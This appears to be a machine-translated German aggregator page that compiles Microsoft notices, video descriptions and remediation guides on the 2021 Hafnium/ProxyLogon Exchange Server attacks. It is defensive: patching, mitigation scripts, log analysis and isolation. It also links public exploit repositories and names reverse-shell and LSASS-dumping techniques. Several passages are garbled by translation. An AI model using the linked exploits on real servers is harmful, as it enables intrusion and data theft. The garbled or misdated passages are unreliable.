Unser Dank gilt den Forschern von Volexity und Dubex, die uns über Aspekte dieser neuen Hafnium-Aktivität auf dem Laufenden gehalten und mit uns zusammengearbeitet haben, um die Angriffe verantwortungsvoll anzugehen

Informationen über Cyberangriffe müssen in großem Umfang und schnell geteilt werden, damit wir alle besser gerüstet sind, uns gegen sie zu verteidigen

Aus diesem Grund sagte Microsoft-Präsident Brad Smith kürzlich vor dem US-Kongress, dass wir Schritte unternehmen müssen, um eine obligatorische Meldung von Cyber-Vorfällen einzuführen

Die Exploits, über die wir heute sprechen, hatten nichts mit den Angriffen auf SolarWinds zu tun

Wir sehen weiterhin keine Beweise dafür, dass die Partei hinter SolarWinds eine Schwachstelle in Microsoft-Produkten und -Diensten entdeckt oder ausgenutzt hat

Um unsere Kunden vor Hafnium zu schützen, haben wir Sicherheitsupdates veröffentlicht, die Exchange Server-Kunden sofort installieren sollten

Wir empfehlen betroffenen Kunden, nicht mit dem Einspielen der verfügbaren Updates zu warten

Kunden von Microsoft Exchange Online sind nicht betroffen

Dieser Artikel enthält weitere Informationen

Kunden, die Unterstützung bei der Aktualisierung ihrer Exchange-Server benötigen, können sich an ihren üblichen Microsoft-Vertreter oder einen zertifizierten Microsoft-Partner wenden

Wenn Sie noch keinen Kontakt zu einem Microsoft-Partner haben, können Sie die Partnersuche nutzen, um einen zu finden

Weitere Informationen und Ressourcen sowie Anleitungen zur Aktualisierung finden Sie in diesen Artikeln:

Ein Beitrag des Microsoft Security Threat Response Teams

Schlagworte: Cyberangriffe, Cybersicherheit, Cyberkriminalität, Cybersicherheit

HAFNIUM Exchange Server 0-Day Exploits New

Video unten ansehen

Weitere Informationen zum Thema exchange hafnium update

***please read the documentation in the links below for more info on remediation*** Let’s talk about the Exchange Server 0-Day exploits announced on March 2 2021. I’ll cover what the threat is, the vulnerabilities, patching and using Microsoft Defender for Endpoint and Azure Sentinel for detection and remediation.
Table of Contents:
00:00:00 Intro
00:00:30 Overview
00:02:30 Who?
00:03:30 Technical Details
00:05:26 Attack Details
00:09:00 Detection and Mitigation
Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/

Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/
One-Click Microsoft Exchange On-Premises Mitigation Tool – March 2021
https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
Ghost in the shell: Investigating web shell attacks
https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/
HAFNIUM targeting Exchange Servers with 0-day exploits – Microsoft Security – https://lnkd.in/gcRFAMB
New nation-state cyberattacks – https://lnkd.in/gvckFkY
**new** blog with IOCs and patching guidance https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020
HAFNIUM targeting Exchange Servers with 0-day exploits https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
Released: March 2021 Exchange Server Security Updates https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901
Exchange Server Security Update FAQ https://webcastdiag864.blob.core.windows.net/2021presentationdecks/March%202021%20Exchange%20Server%20Security%20Update%20-%20v1.2%20-%20EN.pdf
More FAQ on Issues w/ Update https://docs.microsoft.com/en-us/exchange/troubleshoot/client-connectivity/exchange-security-update-issues
Defending Exchange servers under attack https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/
Released: March 2021 Exchange Server Security Updates https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901
Web shell attacks continue to rise https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/
ProcDump: https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
LSASS: https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service
Dept of Homeland Security Directive: https://cyber.dhs.gov/ed/21-02/
Reverse shell loaded using Nishang Invoke-PowerShellTcpOneLine technique https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/reverse-shell-nishang.md
Procdump dumping LSASS credentials https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Credential%20Access/procdump-lsass-credentials.md#procdump-dumping-lsass-credentials
7-ZIP used by attackers to prepare data for exfiltration https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exfiltration/7-zip-prep-for-exfiltration.md
Exchange PowerShell snap-in being loaded https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exfiltration/exchange-powershell-snapin-loaded.md
Powercat exploitation tool downloaded https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/powercat-download.md
Exchange vulnerability launching subprocesses through UMWorkerProcess https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/umworkerprocess-unusual-subprocess-activity.md
Exchange vulnerability creating web shells via UMWorkerProcess https://github.com/martyav/Microsoft-threat-protection-Hunting-Queries/blob/298c96f625612debfb561bb66d2c0030cc304a83/Execution/umworkerprocess-creating-webshell.md
Note: The views and expressions on my videos do not represent those of my employer and are strictly my own.
All content provided on this channel is for informational purposes only. The owner of this channel makes no representations as to the accuracy or completeness of any information on this site or found by following any link on this channel.
The owner of this channel will not be liable for any errors or omissions in this information nor for the availability of this information. The owner will not be liable for any losses, injuries, or damages from the display or use of this information.
These terms and conditions is subject to change at anytime with or without notice.

exchange hafnium update Ähnliche Bilder im Thema

 New  HAFNIUM Exchange Server 0-Day Exploits
HAFNIUM Exchange Server 0-Day Exploits Update

Hafnium Microsoft Exchange Sicherheitsupdate – Der Windows … Aktualisiert

04.03.2021 · Hafnium operiert aus China und ist ein sehr versierter und hochentwickelter Akteur. Aktuell betroffen von der Schwachstelle sind die lokalen Exchange Server 2010, 2013, 2016 und 2019. Exchange Online ist nicht beeinträchtigt. Hafnium Microsoft Exchange Sicherheitsupdate Es ist handelt sich hier um folgende Exchange Patch Information:

+ ausführliche Artikel hier sehen

Read more

Exchange-Sicherheitsupdate

Microsoft hat heute mehrere Sicherheitsupdates für Microsoft Exchange Server veröffentlicht

Die Updates schließen Schwachstellen, die teilweise für gezielte Angriffe genutzt wurden

Dies ist ein neuer, von der Regierung unterstützter Bedrohungsakteur, der vom Microsoft Threat Intelligence Center (MSTIC) identifiziert wurde und Hafnium heißt

Hafnium operiert von China aus und ist ein sehr ausgeklügelter und ausgeklügelter Player

Derzeit sind lokale Exchange-Server 2010, 2013, 2016 und 2019 von der Schwachstelle betroffen

Exchange Online ist nicht betroffen.

Hafnium Microsoft Exchange Security Update

Dies sind die folgenden Exchange-Patch-Informationen:

Um das Sicherheitsrisiko zu minimieren, empfiehlt Microsoft, alle lokalen Exchange-Umgebungen sofort zu patchen

In erster Linie Server, die aus dem Internet erreichbar sind (z

B

Server, die Outlook im Web/OWA und ECP veröffentlichen)

Um diese Schwachstellen zu beheben, sollten Sie auf die neuesten kumulativen Exchange-Updates aktualisieren und dann die entsprechenden Sicherheitsupdates auf allen Exchange-Servern anwenden

Sie können das Exchange Server Health Checker-Skript verwenden, das Sie von GitHub herunterladen können (bitte verwenden Sie die neueste Version)

Sie können das Exchange Server Health Checker-Skript verwenden, das Sie von GitHub herunterladen können (bitte verwenden Sie die neueste Version)

Nachdem Sie dieses Skript ausgeführt haben, können Sie feststellen, ob Sie mit Updates für Ihren lokalen Exchange Server im Rückstand sind (beachten Sie, dass das Skript Exchange Server 2010 nicht unterstützt)

Wir empfehlen außerdem, dass Ihr IT-Team anhand der hier gegebenen Anweisungen überprüft, ob Ihr System möglicherweise angegriffen wurde

Die Sicherheitsupdates können über diese Links heruntergeladen werden:

Das BSI informiert wie folgt: 2021-197772-1132

MSExchange_Vulnerability_Detection_Response

Microsoft-News

Weitere Informationen zum Thema

Hafnium-Testtool

Dieses Tool überprüft die Schwachstellen

Testen Sie Hafnium

ESET-Forschung

Sicherheit

Finden Sie Exchange-Bedrohungen mit Microsoft MSERT

Finger weg vom Werkzeug

Einerseits ist das Ergebnis verwirrend und andererseits riskieren Sie ein DLL-Hijacking

Stefan Kanthak berichtet.

Urgent Update: Ransomware criminals exploiting MS Exchange/Hafnium compromise Update

Video unten ansehen

Weitere hilfreiche Informationen im Thema anzeigen exchange hafnium update

Urgent Update: Ransomware criminals using the Microsoft Exchange compromise – news this morning reveals that attacks against Exchange servers are doubling every 2 hours and its turning into a big ransomware attack resulting in cybercriminals exploiting it for financial gain.
Top Tips from Cybersecurity Panel:
1. Get your prep done
2. Test and Increase your Backups
3. Monitor your Network and Systems
4. Check Your Insurance Policy – because there are mistakes you can make that might void it
5. Get the right patch – it’s never too late
Run the Microsoft Scripts that Microsoft has provided.

exchange hafnium update Sie können die schönen Bilder im Thema sehen

 Update  Urgent Update: Ransomware criminals exploiting MS Exchange/Hafnium compromise
Urgent Update: Ransomware criminals exploiting MS Exchange/Hafnium compromise Update

Hafnium Update: Continued Microsoft Exchange … New

Updating

+ ausführliche Artikel hier sehen

HAFNIUM Microsoft on-prem Exchange Server patching Update

Video ansehen

Weitere hilfreiche Informationen im Thema anzeigen exchange hafnium update

In this video, I will show you how to install the latest CU on your Microsoft Exchange 2019 and then install the KB5000871 update to protect it from vulnerabilities that were found in March of 2012. Here is the link to the updated description on the Microsoft site:
https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
If you like the video please check out my Skillshare course on Windows Server 2019 for free https://skl.sh/2NRhYo9 or on Udemy https://www.udemy.com/course/install-and-configure-windows-server-2019-get-a-job-in-it/?referralCode=F49CC1D6C00E7F39248F

exchange hafnium update Einige Bilder im Thema

 Update  HAFNIUM Microsoft on-prem Exchange Server patching
HAFNIUM Microsoft on-prem Exchange Server patching New

How to Recover Microsoft Exchange from HAFNIUM Attacks Update

10.08.2021 · Update Affected Exchange Servers Exchange 2007 and 2003 are believed to be unaffected from the Hafnium attack. However, you must upgrade the server to a supported version to continue getting updates. Exchange 2010 …

+ ausführliche Artikel hier sehen

Read more

Microsoft hat kürzlich mehrere Zero-Day-Schwachstellen auf lokalen Versionen des Exchange-Servers entdeckt

Laut Microsoft Threat Intelligence Center werden diese Schwachstellen von der Hafnium-Gruppe ausgenutzt – einer Angriffsgruppe, von der angenommen wird, dass sie von China unterstützt wird

Die Bedrohungsakteure zielen hauptsächlich auf Unternehmen und Institutionen in den Vereinigten Staaten ab, die US-basierte Virtual Private Server (VPS) verwenden, um Fernzugriff auf Exchange-Server zu erhalten, um kritische Daten aus dem Netzwerk der Organisation zu stehlen

Berichten zufolge hat die Hafnium-Gruppe gehackt über 30.000 Organisationen in wenigen Tagen bis zum 05

März

Am 12

März hat Microsoft geschätzt, dass mehr als 82.000 Exchange-Server (von anfänglich 400.000 am 01

März) weltweit immer noch anfällig sind

Als Reaktion auf den Hafnium-Angriff hat Microsoft veröffentlicht mehrere Sicherheitsupdates für den Exchange-Server

Es wird dringend empfohlen, den lokalen Exchange-Server sofort zu aktualisieren

Wie wirkt Hafnium?

Hafnium nutzt Schwachstellen auf ungepatchten Systemen aus und nutzt die Exchange-Authentifizierungsarchitektur, um mit Administratorrechten auf lokale Exchange-Server zuzugreifen und Web-Shells auf dem Server des Opfers bereitzustellen zusätzliche Malware oder Ransomware in der Umgebung des Opfers, um das System weiter zu gefährden

Die ausgenutzten Schwachstellen sind CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 und CVE-2021-27065

Sie können die folgenden Maßnahmen ergreifen, um die Risiken zu mindern und Benutzerpostfächer vom betroffenen Exchange-Server wiederherzustellen

1

Führen Sie das Microsoft On-Premises Mitigation Tool (EOMT) aus

Microsoft hat das Exchange On-Premises Mitigation Tool (EOMT) veröffentlicht, das mit MS Exchange 2019, 2016 und 2013 funktioniert

Es funktioniert auch auf Exchange 2010 mit PowerShell 3.0-Unterstützung, hat aber minimale Funktionalität

Das Tool behebt die Schwachstelle CVE-2021-26855

Das Tool hilft Ihnen zu überprüfen, ob Ihr Exchange-Server anfällig ist

Gehen Sie folgendermaßen vor, um EOMT zu verwenden:

Laden Sie das EOMT-Tool herunter und extrahieren Sie den Sicherheitsordner am gewünschten Speicherort

Öffnen Sie PowerShell als Administrator und navigieren Sie dann zum Speicherort des extrahierten Ordners

In unserem Fall ist es:

cd C:\Benutzer\Administrator\Dokumente\Sicherheit\src

Führen Sie nun das Skript EOMT.ps1 aus, um zu überprüfen, ob Ihr Server anfällig ist. ..\EOMT.ps1

Das Skript prüft, ob der Server angreifbar ist, indem es das URL-Rewrite-Tool von IIS herunterlädt und installiert

Anschließend wird Microsoft Safety Scanner oder MSERT im Schnellscanmodus heruntergeladen und ausgeführt

Der MSERT scannt und entfernt Bedrohungen und Web-Shells vom Server

Wenn der Server nicht anfällig ist, führt er nur den MSERT-Schnellscan aus

Sie können auch Text-ProxyLogon.ps1 (früher bekannt als Test-Hafnium) zur Automatisierung ausführen die Befehle

Es führt den CVE-2021-26855-Test viel schneller aus und exportiert den Bericht in CSV-Dateien

Die CSV-Datei enthält eine Liste verdächtiger Zip-/Rar-/7x-Dateien, die das Skript in den Programmdaten findet

Es ist bekannt, dass Web-Shells solche Dateiformate zur Exfiltration verwenden

Überprüfen Sie jede Datei, um zu überprüfen, ob diese Dateien gültig sind

2

Aktualisieren Sie betroffene Exchange-Server

Es wird angenommen, dass Exchange 2007 und 2003 von dem Hafnium-Angriff nicht betroffen sind

Sie müssen den Server jedoch auf eine unterstützte Version aktualisieren, um weiterhin Updates zu erhalten

Exchange 2010 ist nur von der Schwachstelle CVE-2021-26857 betroffen

Aktualisieren Sie den Server mit den neuesten Sicherheitspatches und verwenden Sie das EOMT-Skript, um den Server auf mögliche Ausnutzung zu untersuchen

Exchange 2019, 2016 und 2013 sind die am stärksten betroffenen Exchange-Serverversionen

Sie müssen die oben beschriebenen Risikominderungsschritte anwenden und die Exchange Server-Sicherheitsupdates vom März 2021 installieren

3

Wiederherstellen aus Sicherung

Wenn Ihr Exchange-Server aufgrund des Hafnium-Angriffs kompromittiert und beschädigt oder abgestürzt ist, können Sie Setup /m:recoverserver verwenden, um den Server wiederherzustellen

Es ist jedoch wichtig, dass die Windows Server- und Exchange-Version auf dem neuen Server gleich bleiben, um Probleme zu vermeiden.

Verwenden Sie dann Ihr Backup, um die Datenbank auf einem neuen Server wiederherzustellen und den infizierten Server herunterzufahren oder zu löschen

4

Verwenden Sie das Exchange-Wiederherstellungstool

Ein Exchange-Wiederherstellungstool wie Stellar Repair for Exchange ist praktisch, wenn Sie kein Backup haben

Die Software hilft Administratoren, den Exchange-Server vor böswilligen Angriffen wiederherzustellen

Es hilft auch bei der Reparatur beschädigter Datenbanken aufgrund von Serverabstürzen, Stromausfällen oder Hacking und kann Ausfallzeiten erheblich reduzieren

Mit der Software können Sie Postfächer aus einer kompromittierten Exchange-Server-Datenbank extrahieren und in PST speichern

Sie können die Postfächer auch direkt aus der Datenbank auf einen Live-Exchange-Server oder Office 365 exportieren

Es funktioniert mit MS Exchange 2019 und älteren Versionen, einschließlich Exchange 5.5.

HINWEIS: Führen Sie das EOMT-Skript aus, bevor Sie die Stellar Repair for Exchange-Software verwenden hoch

Hafnium ist nicht neu

Es hat zuvor Unternehmen in den USA in verschiedenen Branchen angegriffen

Daher ist es wichtig, Techniken zu erlernen, um ungepatchte Server vor solchen Angriffen zu schützen

Durch die Aktivierung effektiver Verteidigungs- und Backup-Techniken können Sie Ihre Exchange-Server vor zukünftigen Angriffen schützen.

Episode 29 – Hafnium \u0026 Microsoft Exchange Hack Update! New

Video ansehen

Weitere Informationen zum Thema exchange hafnium update

This week, Matt Mosley and Kash Izadseta cover an update on the Microsoft Exchange Server Hafnium Hack!
**Links mentioned in this episode:**
* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
* https://www.zdnet.com/article/update-immediately-microsoft-rushes-out-patches-for-exchange-server-zero-day-attacks/
* https://www.darkreading.com/threat-intelligence/microsoft-fixes-exchange-server-zero-days-exploited-in-active-attacks/d/d-id/1340305
* https://www.linkedin.com/in/kashizadseta?trk=pub-pbmap
* https://www.linkedin.com/in/mattmosley1
* http://tevoratalks.com
**Instagram, Twitter, Facebook: @TevoraTalks **

exchange hafnium update Einige Bilder im Thema

 Update  Episode 29 - Hafnium \u0026 Microsoft Exchange Hack Update!
Episode 29 – Hafnium \u0026 Microsoft Exchange Hack Update! New Update

Hafnium Exploit – MSXFAQ New

06.03.2021 · Seit 16.3.2021 gibt es mit dem Exchange 2016 CU20 und Exchange 2019 CU9 eine aktuelle Version inklusive Security Update und anderen Bugfixes. Updates für Exchange 2019 und Updates für Exchange 2016 Aus aktuellem Anlass bieten wir eine weitere Net at Work Hafnium Sprechstunden in Form eines öffentlichen Teams-Meeting an

+ mehr hier sehen

Read more

Hafnium-Exploit

Am 2

März 2021 meldete Microsoft mehrere Exploits in Exchange, die angeblich von einer Gruppe namens „Hafnium“ aktiv ausgenutzt werden

Achtung: April 2021-Updates ersetzen die Hafnium-Updates

Siehe Pwn2Own 2021

Hafnium Follow-up – Was wir von Hafnium lernen, überprüfen und verbessern sollten für Exchange 2019 und Updates für Exchange 2016

Aus aktuellem Anlass bieten wir eine weitere Net at Work Hafnium-Sprechstunde in Form eines öffentlichen Teammeetings an

Weitere Termine werden unter https://www.netatwork.de/self-hosted-exchange-server-zero-day-attacks/ veröffentlicht

Sprechstunde verpasst? Die Informationen vom 10.03.2021 habe ich für Sie festgehalten

Der dafür verwendete Foliensatz

hafnium-prechhour.20210310.pdf (Wird für die Net at Work-Sprechstunde verwendet)

hafnium-sprechstunden.20210318.pdf (Verwendet (korrigiert) beim MBUF-Treffen https://mbuf.de/)

Wenn Ihr Exchange Server über HTTP/HTTPS aus dem Internet erreichbar ist, dann ist die Kombination aus vier CVEs Ihr Problem:

Schon das Mitlesen oder Exportieren beliebiger E-Mails stellt für viele Unternehmen ein ernsthaftes Problem dar, da Betriebsgeheimnisse exportiert werden können und Erpressungen folgen können

Viel kritischer ist die komplette Übernahme des Servers über eine Web-Shell, die der Angreifer selbst installiert und die weitere Aktionen von außen auslösen kann

Der Angreifer verfügt wahrscheinlich über die Berechtigungen „LocalSystem“ und „ExchangeTrustedSubsystem“

Auch wenn die Berechtigungen von Exchange und einem Rechner noch nicht „Domain Admin“ sind, ist das Schadenspotential sehr hoch

Aber die Web-Shell ist ein Sprungbrett in Ihr LAN mit privilegierten Rechten, dump von LSASS oder verwenden Sie Mimikatz

Aus meiner Sicht ist Gefahr im Verzug und Sie sollten Ihren Server sofort auf die aktuelle CU updaten und die Updates installieren

Ist Ihnen dies nicht möglich, sollten Sie den Zugriff aus dem Internet umgehend vorauthentifizieren und den anonymen Zugriff verhindern

Dies bricht jedoch Anmeldungen über OAUTH, z

Exchange Hybrid Free/Busy und ist kein Schutz davor, dass ein authentifizierter Benutzer dann die Lücken ausnutzt oder es andere Lücken gibt.

Für das Sicherheitsupdate vom Vormonat gab es kurz darauf ein Sample.

Exploit-Sample für 2021-24085 (Feb 2021 Security Aktualisieren)

https://github.com/sourceincite/CVE-2021-24085

https://github.com/sourceincite/CVE-2021-24085 Proxy-Angriffskette – Proxylogon, Proxyshell, Proxyoracle, Proxytoken, CVE-2021-42321 Deserialisierung RCE Full-Chain-Exploit-Tool

https://github.com/FDlucifer/Proxy-Attackchain

Bei den aktuellen Problemen habe ich den Eindruck, dass verschiedene Gruppen bereits einen Code haben, da ich immer mehr unterschiedliche Payloads sehe, die nichts mit dem ersten Angriff zu tun haben

Mögliche Opfer gibt es genug

Inzwischen findet wohl ein Wettlauf statt, welche Website die höheren Serverzahlen schätzt.

Warnung der Welt vor einer tickenden Zeitbombe

https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/

Hunderttausende von Servern und 30.000 Organisationen

https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/ Hunderttausende von Servern und 30.000 Organisationen 130.000 angreifbare Server

https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/

https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/ BSI-Statistik: Stand 16

März 2021

Quelle BSI Twitter, Arne Schönbohm, Präsident des Bundesamtes für Sicherheit in der Informationstechnik https://twitter.com/ArneSchoenbohm/status/1372203599657336836

(Grafik wurde neu formatiert und das falsche Jahr (2020 statt 2021) wurde korrigiert

Angreifbar sind alle Exchange-Server, die über HTTP erreichbar und derzeit nicht gepatcht sind

Exchange Versionsstand 2013-2019 Alle Versionen sind ohne das Update gleichermaßen betroffen und angreifbar

Exchange 2013

Exchange 2016

Exchange 2019

Download-Links für viele Versionen, sogar ältere CUs, die eigentlich nicht mehr unterstützt werden

https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871- 9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b 2010 Exchange 2010 hat nur die Schwachstelle CVE-2021-26857 und diese kann nur mit Authentifizierung genutzt werden

Angreifer müssen auf andere Weise über gültige Anmeldeinformationen verfügen, um die Sicherheitsanfälligkeit auszunutzen

Daher gibt es auch für diese Exchange-Version ein Update, obwohl das Support-Ende bereits im Oktober 2020 abgelaufen ist

Quelle: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released- für-exchange-server/

Exchange 2010 SP3 (beliebige RU)

https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-service-pack-3-march-2-2021-kb5000978- 894f27bf-281e-44f8-b9ba-dad705534459 Exchange Online Laut Scott Schnoll (Microsoft) war Exchange Online nicht anfällig

Quelle: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/ 2003

2007 Laut Microsoft nicht betroffen

Quelle: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/

Inzwischen haben auch die üblichen staatlichen Stellen entsprechende Warnungen veröffentlicht: Microsoft Exchange Schwachstellen CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 Detection and Response

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachtstelle_Detection_Reaction.pdf?__blob=publicationFile&v=3

BSI: Mehrere Schwachstellen in MS Exchange

https://www.bsi.bund.de/SharedDocs/CyberSicherheitswarningen/DE/2021/2021-197772-1132.pdf?__blob=publicationFile&v=4

Update: Sicherheitslücken in MS Exchange – Informationen und Unterstützung | BSI

CISA gibt Notfallrichtlinie heraus und warnt vor Sicherheitslücken in Microsoft Exchange

https://us-cert.cisa.gov/ncas/current-activity/2021/03/03/cisa-issues-emergency-directive-and-alert-microsoft-exchange

https://us-cert.cisa.gov/ncas/current-activity/2021/03/03/cisa-issues-emergency-directive-and-alert-microsoft-exchange Emergency Directive 21-02: Mitigate Microsoft Exchange On- Schwachstellen von Premises-Produkten

https://cyber.dhs.gov/ed/21-02/

https://cyber.dhs.gov/ed/21-02/ US-CERT: [CIS2021a] CISA-Warnung (AA21-062A) Mitigate Microsoft Exchange Server Vulnerabilities

https://us-cert.cisa.gov/ncas/alerts/aa21-062a

In den ersten Tagen der Seite habe ich zuerst das „Update“ beschrieben

Diese Reihenfolge habe ich nun geändert

Wir sind viele Tage weiter und die Zahl der infizierten Exchange-Server dürfte weiter steigen, da leider viele Administratoren und Dienstleister das Problem immer noch nicht aktiv angehen

Heute gehe ich davon aus, dass ein Server kompromittiert ist und wenn der Angreifer die richtigen Tools eingesetzt hat, dann ist nicht nur dieser eine Server betroffen, sondern auch andere Systeme bzw

deren Active Directory können nicht mehr als „vertrauenswürdig“ angesehen werden

Mein Vorschlag.

Abriegelung

Verhindern Sie, dass der Exchange-Server aus dem Internet erreichbar ist oder Verbindungen zum Internet herstellen kann

Sichern Sie außerdem Protokolle, bevor Sie sie löschen oder überschreiben

Isolieren Sie außerdem den Server von internen Systemen

Malware versucht auch, ihre anderen Server zu kompromittieren

Im einfachsten Fall haben sie den lokalen Administrator und trennen Exchange vom Netzwerk

Gegebenenfalls sollten Sie auch andere Server vom Netz nehmen, bis Sie Ihren Exchange Server gesichert und ausgewertet haben

Analyse

Überprüfen Sie Ihre vorhandenen Protokolle, um festzustellen, ob ein Einbruch stattgefunden hat

Die Ausnutzung der Schwachstelle kann über Einträge im IISLog identifiziert werden, wenn die Angreifer die Logs nicht verändern

Die installierten Programme und Backdoors werden oft, aber nicht immer, von aktuellen Virenscannern gefunden

Je nach Ergebnis müssen Sie möglicherweise eine unbequeme Entscheidung treffen

Aufräumen, gegebenenfalls patchen

wieder aufbauen

Entfernen Sie die installierten Backdoors und verhindern Sie eine erneute Infektion, indem Sie die Updates installieren

Das Update wird möglicherweise nicht installiert

Verschiedene Angreifer ändern beispielsweise NTFS-Berechtigungen, um die Installation von Updates zu blockieren, damit ein weniger erfahrener Admin dies nicht bemerkt oder verärgert aufgibt

Weitere Analyse

Gerade wenn man die bestehende Umgebung weiter nutzt, muss man wachsam sein und so viel wie möglich herausfinden

Die Abschnitte im Einzelnen:

Das Gateway sind die Exchange-Webdienste und als allererste Schutzmaßnahme hat Microsoft URL-Rewrite-Regeln beschrieben, mit denen der Zugriff blockiert werden kann

Implementieren Sie eine IIS-Umschreibungsregel und deaktivieren Sie Unified Messaging (UM), Exchange Control Panel (ECP) VDir und Offline Address Book (OAB) VDir Services

Microsoft Exchange Server Vulnerabilities Mitigations – updated March 15, 2021

Ich würde diesen “Fix” nur anwenden, wenn Sie den Sicherheitsbatch wirklich nicht installieren können

Microsoft listet “ActiveSync” nicht auf, aber eine BSI-Veröffentlichung vom 6.3 listet auch ActiveSync “und andere Dienste” auf

Verhindern Sie zunächst, dass der Exchange-Server über HTTP aus dem Internet erreichbar ist

Blockieren Sie auch ausgehende Verbindungen vom Exchange Server, solange diese den Status ihres Servers nicht kennen

Logs (Eventlog, IISLog, CASLog, Firewall etc.) vor Löschen/Überschreiben sichern bis die Analyse abgeschlossen ist

Je nach Anzahl der Server und Größe der Logfiles kann die Analyse länger dauern

Aktion Check Eingehenden HTTP-Traffic blockieren kann Zugriff auf Port 443 Ihres Exchange-Servers auf der externen Firewall verhindern Wenn Sie einen Reverse-Proxy oder Load Balancer verwenden, können Sie dies auch dort tun Ausgehenden Datenverkehr blockieren Die Angreifer verwenden Remote-Shells, um eine Verbindung nach außen aufzubauen und über eine Shell interaktiv auszuführen Kommandos oder Malware nachladen

Ihr Exchange Server soll auch nicht mehr “surfen” dürfen (HTTP-Proxy), auch wenn das die weitere Fehlersuche erschwert

Auf diese Weise verhindern Sie auch “Zuschauer” und verhindern, dass jemand Ihre Eingaben aufzeichnet Der Server oder Prozess wurde abgespeichert Isolieren Sie Ihren Exchange-Server Wenn Sie vermuten, dass der Server compr ausgelassen wird, dann sollten Sie die Exchange-Dienste stoppen und den Server isolieren.Gegebenenfalls eine DENY-Regel auf dem W Die Windows-Firewall tut es auch

Die Schwachstelle besteht seit langem und wurde erstmals im Dezember von DEVCORE (https://proxylogon.com/) gemeldet und am 6

Januar von Volexity bei einem Kunden im Rahmen der Überwachung (Intrusion Detection) des Netzwerkverkehrs entdeckt

Wie lange die Angreifer von der Lücke wussten, ist nicht bekannt

Wahrscheinlich haben die Angreifer erst dann interessante und lohnende Ziele angegriffen, wenn sie entdeckt werden

Erst im Februar stiegen die Infektionszahlen, und mit der Veröffentlichung der Lücke und entsprechenden Updates am 2

März 2021 wird es immer weniger verwundbare Installationen geben

Die Angreifer werden also wahrscheinlich ihre Werkzeuge gegen die Menge einsetzen.

Aktionsprüfung MSERT.EXE Dieses Tool verwendet die neuesten Defender-Pattern-Dateien, um bekannte Malware zu entfernen

Es ist kein 100-prozentiger Schutz, da andere Angreifer jetzt angepasste Schadsoftware verwenden

Da Ihr Exchange-Server hoffentlich nicht surfen kann, müssen Sie die Datei auf einem anderen Client herunterladen und auf den Server übertragen

Verwenden Sie immer die neueste Version

Microsoft Safety Scanner (MSERT.EXE)

https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download Warnung:

MSERT findet nur, was es erkennt

Ein negatives Ergebnis kann daher nicht als Freifahrt verstanden werden

Zumal die schädlichen Bestandteile vielfältiger geworden sind

Test-ProxyLogon.ps1 Dieses Skript enthält Tools zur Analyse Ihres Servers, die zuvor als einzelne Skripte verteilt wurden

Es durchsucht Ihre IIS-Protokolle, Ereignisprotokolle und Verzeichnisse nach Spuren der Hafnium-Gruppe

Auch hier sollten Sie immer die neuste Version verwenden

Test-ProxyLogon.ps1 (früher bekannt als Test-Hafnium, dieses Skript automatisiert alle vier Befehle)

https://github.com/microsoft/CSS-Exchange/tree/main/Security

https://github.com/microsoft/CSS-Exchange/releases/latest/download/Test-ProxyLogon.ps1 Er findet recht zuverlässig die ersten Angriffe via „CVE-2021-26855“, die recht zuverlässig auf einen Einbruch hindeuten

So führen Sie das GitHub-Skript für die Hafnium-Schwachstelle aus

https://www.youtube.com/watch?v=wwJlfhRCwAc Es findet auch Fehlalarme, z.B

ZIP-Dateien von Symantec, McAfee usw

in ProgramData

Hier muss man genauer hinschauen

Achtung: Diese Skripte prüfen ihre HTTP-Logs

Wenn Sie diese Dateien automatisch löschen, kann das Skript sie nicht finden

